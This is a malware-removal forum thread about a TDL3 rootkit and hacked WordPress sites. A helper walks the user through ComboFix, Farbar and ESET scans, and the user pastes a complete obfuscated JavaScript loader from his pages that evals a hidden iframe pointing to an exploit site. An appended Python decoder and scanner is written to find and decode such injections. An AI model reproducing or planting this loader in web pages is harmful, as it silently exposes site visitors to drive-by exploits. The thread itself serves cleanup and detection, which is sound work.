C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.20575_none_39c1885e54505643\atapi.sys | c:\windows\SysWow64\Drivers\atapi.sys


Save this as CFScript.txt, in the same location as ComboFix.exe (called ComboFix.exe in the below graphic)


[image: CFScript.txt being dragged onto ComboFix.exe]

Referring to the picture above, drag CFScript into ComboFix.exe

If the program asks you to update ComboFix then click Yes.

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.

#7 Stillrain
  • Topic Starter

  • Members
  • 9 posts

Posted 02 March 2012 - 08:25 PM

Hi again m0le,

I did as you instructed, attached you'll find the log.


Just a few questions, if you'd be so kind:

- Is there any way to know what kind of TDSS it was and what data it has been sending out?

- Some of my websites are infected with this TDSS, so, after I format, is there a patch I can apply, or any kind of protection I can use before accessing my server? Otherwise it's just going to be a loop of infections, right?

- I have another computer but it was connected all the time to the infected one, through Windows ICS, and I also accessed the infected server from that system. So I'll assume it's also infected for now; with what software should I check it?


Thanks again for your assistance.


#8 m0le

    Can U Dig It?

  • Malware Response Team
  • 34,527 posts
  • Gender:Male
  • Location:London, UK

Posted 02 March 2012 - 09:04 PM

- Is there any way to know what kind of TDSS it was and what data it has been sending out?

- Some of my websites are infected with this TDSS, so, after I format, is there a patch I can apply, or any kind of protection I can use before accessing my server? Otherwise it's just going to be a loop of infections, right?

- I have another computer but it was connected all the time to the infected one, through Windows ICS, and I also accessed the infected server from that system. So I'll assume it's also infected for now; with what software should I check it?


- atapi.sys has been replaced and is no longer showing as infected so it's TDL3. We will run a few more scans to see whether it has brought in anything capable of the backdoor attack I posted before.

- Your websites can't be infected directly by a rootkit, it attacks the PC, but we'll take a look at that once I'm happy the main machine is clean.

- You should assume the other machine is infected and we can check that afterwards. For now, disconnect it.


If you could now run FSS

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.


#9 Stillrain
  • Topic Starter

  • Members
  • 9 posts

Posted 02 March 2012 - 09:17 PM

atapi.sys has been replaced and is no longer showing as infected so it's TDL3. We will run a few more scans to see whether it has brought in anything capable of the backdoor attack I posted before.

Well, that's great! I was reading that the variant that usually infects x64 systems is TDL4, which can contain trojans and keyloggers to steal passwords, credit cards, bank accounts, etc. Pretty scary stuff.. :o

Here's the log from FSS:

Farbar Service Scanner Version: 01-03-2012
Ran by x-Daemon (administrator) on 03-03-2012 at 04:09:44
Running from "C:\Users\x-Daemon\Desktop\RootKit LOGS\FSS"
Microsoft Windows 7 Ultimate Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Attempt to access Google IP returned error: Google IP is offline
Yahoo IP is accessible.


File Check:
========
C:\Windows\System32\nsisvc.dll => MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys => MD5 is legit
C:\Windows\System32\dhcpcore.dll => MD5 is legit
C:\Windows\System32\drivers\afd.sys => MD5 is legit
C:\Windows\System32\drivers\tdx.sys => MD5 is legit
C:\Windows\System32\Drivers\tcpip.sys => MD5 is legit
C:\Windows\System32\dnsrslvr.dll => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit


**** End of log ****

Edited by Stillrain, 02 March 2012 - 09:20 PM.


#10 m0le

    Can U Dig It?

  • Malware Response Team
  • 34,527 posts
  • Gender:Male
  • Location:London, UK

Posted 02 March 2012 - 09:26 PM

This looks like just a TDL3 rootkit so far. That's certainly good news in the circumstances.

If you like reading this stuff then ESET have done some very detailed (and techy) write-ups on TDL3 and TDL4


Please run an ESET online scan now

I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the [image] button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on [image] to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the [image] icon on your desktop.
  • Check [image]
  • Click the [image] button.
  • Accept any security warnings from your browser.
  • Under scan settings, check [image] and check Remove found threats
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • Copy and paste the resulting log in your next reply
If no log is generated that means nothing was found. Please let me know if this happens.

If you think a log should have been generated then go to C:\Program Files\ESET\ESET Online Scanner\log.txt to find it.


Once that's posted please let me know what symptoms remain - especially with regards to your website problems that you mentioned.

#11 Stillrain
  • Topic Starter

  • Members
  • 9 posts

Posted 03 March 2012 - 10:01 AM

Hi m0le, it took around 10 hours, here's the scan result:

C:\Qoobox\Quarantine\C\Users\x-Daemon\AppData\Local\TempDIR\BetterInstaller.exe.vir a variant of Win32/Adware.Somoto.A application cleaned by deleting - quarantined
C:\Users\x-Daemon\Downloads\cdbxp_setup_4.4.0.2838.exe Win32/OpenCandy application deleted - quarantined
C:\Users\x-Daemon\Downloads\FreeYouTubeDownloaderInstaller.exe a variant of Win32/Adware.Somoto.A application deleted - quarantined
C:\Users\x-Daemon\Downloads\VDownloader3.2.807.exe Win32/OpenCandy application deleted - quarantined
C:\Users\x-Daemon\Downloads\fsSetup132.exe Win32/Adware.Toolbar.Dealio application deleted - quarantined
D:\Dell17-HD\Desktop\Nokia\bb5.zip probably a variant of Win32/Agent.DSPQFA trojan deleted - quarantined
D:\Dell17-HD\server\backup_658978.tar.gz HTML/Iframe.B.Gen virus deleted - quarantined
D:\Dell17-HD\server\deoos\wp-includes\js\jquery\jquery.js JS/Agent.NEJ trojan cleaned by deleting - quarantined
D:\Dell17-HD\server\wordpress17\Glorius-theme.zip PHP/Kryptik.AB trojan deleted - quarantined
D:\Dell17-HD\dev\soft\GIF_Animator_3.0.zip Win32/Kryptik.BAK.gen trojan deleted - quarantined

-------------------------------------------------------------------------------------------------------
Some of the infected websites: site1, site2, site3
The AVG report for all of them is the same, like this one, showing warnings for Blackhole exploit kit and link to exploit site.

The warnings on my browser started a few days ago, that's why I started suspecting and investigating my system.

Is TDSS still responsible for the PayPal account hijacking? I should still reformat the system, right? Or, it being TDL3, is it safe now?

Can external storage media get infected by this? What can I scan for the infection with, since antivirus, antimalware and even TDSSKiller didn't detect it?

Thanks again, and you can count on my donation to UNITE once it's safe to access my account.

Edited by m0le, 03 March 2012 - 06:18 PM.


#12 m0le (Can U Dig It?, Malware Response Team, 34,527 posts, London, UK)

Posted 03 March 2012 - 06:21 PM

Okay, had to deactivate the site links because they go to sites which appear to be malicious in content.

Are these three of your own written websites which are now showing exploits?

#13 Stillrain (Topic Starter, Members, 9 posts)

Posted 03 March 2012 - 07:17 PM

Yes, and I'm realizing now that only WordPress-based sites are infected; there are other sites on the same server that don't show malicious content. What I don't know is whether I got infected from the sites, or the other way around.

I've tried many online scanners and all say the sites are clean, except AVG, but it doesn't tell me where the malicious code is. Is it safe to access the server through ftp to try and find it?

#14 m0le (Can U Dig It?, Malware Response Team, 34,527 posts, London, UK)

Posted 03 March 2012 - 07:23 PM

D:\Dell17-HD\server\backup_658978.tar.gz HTML/Iframe.B.Gen virus deleted - quarantined


This is an exploit. You're right though, this infection has hit WordPress sites. Have you contacted them?

#15 Stillrain (Topic Starter, Members, 9 posts)

Posted 04 March 2012 - 07:17 AM

I've opened a thread at WordPress, pretty much the only way of getting support, but it's usually answered by other users' guesses, so I wouldn't cling to it.

I think I found the malicious code checking the source code on the browser, what do you think?

<script type='text/javascript'>var a=!1;dkzvv = "\x6C\x6F\x6E\x6C\x79";if(!document.cookie.match(dkzvv)){if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a49a56a49.5a47.5a53.5a54.5a54a22a49a49.5a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a49a56a49.5a47.5a53.5a54.5a54a22a49a49.5a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+s[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(s)e(q);d_em=new Date;d_em.setTime(d_em.getTime());mme=new Date(d_em.getTime()+72E6);document.cookie=dkzvv+"="+escape(mme.toGMTString())+";expires="+mme.toGMTString()+";path=/";};</script>


After upgrading the WordPress installation it disappears, so maybe that's one solution.

The thing is, I don't have a way to test whether the infection is really gone, as the only tool that shows it is the AVG Online Scanner, and that isn't an actual scan of the site but reports from users' antivirus.

Is there any tool you know about which I could use to test if the infection is really gone?

Thanks

Edited by Stillrain, 04 March 2012 - 02:11 PM.
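The script quoted in the post above is a cookie-gated loader: it stores a cookie named by the hex-escaped string, then rebuilds a hidden payload from the long numeric array (each entry becomes one character via `String.fromCharCode(-h*(2-1+1*n[j]))`, where `h = -2*Math.log(Math.E) = -2`, so the code point is simply `2*(n[j]+1)`) and `eval`s it. Decoded, the sample appends a hidden 10x10 iframe pointing at an external `in.cgi` URL, which is the "link to exploit site" AVG was flagging. The following Python is an added example, not something from the thread or from WordPress: it scans a local copy of the site (for example the FTP mirror) for that array-plus-`split` shape, decodes each hit, and pulls out any URLs so they can be blocklisted and reported. The regex, the hint strings and the function names are my assumptions generalised from this single sample; the constructed test page embeds only the first 48 entries of the array from the post.

```python
"""Added example (not from the thread): locate the cookie-gated, numeric-array
obfuscated <script> block quoted above in a WordPress tree and decode it so a
site owner can see what it injects.  Names and the regex are assumptions,
generalised from the single sample in the post."""
import re
from pathlib import Path

# Shape of the sample: a quoted string of numbers joined by one lowercase
# letter, immediately .split() on that same letter.
INJECTION_RE = re.compile(
    r'"(?P<data>[0-9.]+(?:(?P<sep>[a-z])[0-9.]+)(?:(?P=sep)[0-9.]+)*)"'
    r'\.split\("(?P=sep)"\)'
)
# Other tell-tales seen in the sample; each one found near a hit raises confidence.
HINTS = ("document.cookie.match", "Math.log(Math.E)", "toGMTString", "[zz]")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_char_array(data, sep, scale=2.0, offset=1.0):
    """Reverse the loop  ss += String.fromCharCode(-h*(2-1+1*n[j]))  from the
    sample.  There h = -2*Math.log(Math.E) = -2, so each code point is
    2*(n[j]+1); scale and offset are parameters so small variants can be tried."""
    return "".join(chr(round(scale * (float(tok) + offset))) for tok in data.split(sep))


def find_injections(text):
    """Return one dict per suspicious array found in `text`, with the decoded
    payload, a hint count and any URLs the payload contains."""
    hits = []
    for m in INJECTION_RE.finditer(text):
        decoded = decode_char_array(m.group("data"), m.group("sep"))
        window = text[max(0, m.start() - 600):m.end() + 600]
        hits.append({
            "offset": m.start(),
            "sep": m.group("sep"),
            "tokens": m.group("data").count(m.group("sep")) + 1,
            "hints": sum(h in window for h in HINTS),
            "decoded": decoded,
            "urls": URL_RE.findall(decoded),
        })
    return hits


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a local copy of the site and map each file path to its hits."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in suffixes and path.is_file():
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample page for offline use: the first 48 entries of the array
# quoted in the post, wrapped in the same skeleton (cookie gate, split, loop).
SAMPLE_ARRAY = (
    "3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a"
    "33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a"
    "18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5"
)
SAMPLE_HTML = (
    "<html><body><p>hello</p>\n"
    "<script type='text/javascript'>var a=!1;dkzvv = \"\\x6C\\x6F\\x6E\\x6C\\x79\";"
    "if(!document.cookie.match(dkzvv)){h=-2*Math.log(Math.E);n=\"" + SAMPLE_ARRAY +
    "\".split(\"a\");for(i=0;-n.length<-i;i++){j=i;ss=ss+s[f](-h*(2-1+1*n[j]));}}"
    "</script></body></html>\n"
)

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_HTML):
        print("offset", hit["offset"], "tokens", hit["tokens"], "hints", hit["hints"])
        print(repr(hit["decoded"]))
        print("urls:", hit["urls"])
```

Run `scan_tree("/path/to/site-mirror")` against a fresh download of the hosting account rather than the live pages: the cookie gate means a browser that has already been served the payload once will not see it again for 20 hours (`72E6` ms), which is exactly why repeat visits and most online scanners report the site as clean. Grepping the files on disk sidesteps that, and diffing the decoded output against a clean WordPress checkout shows which theme and plugin files carry the insert.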
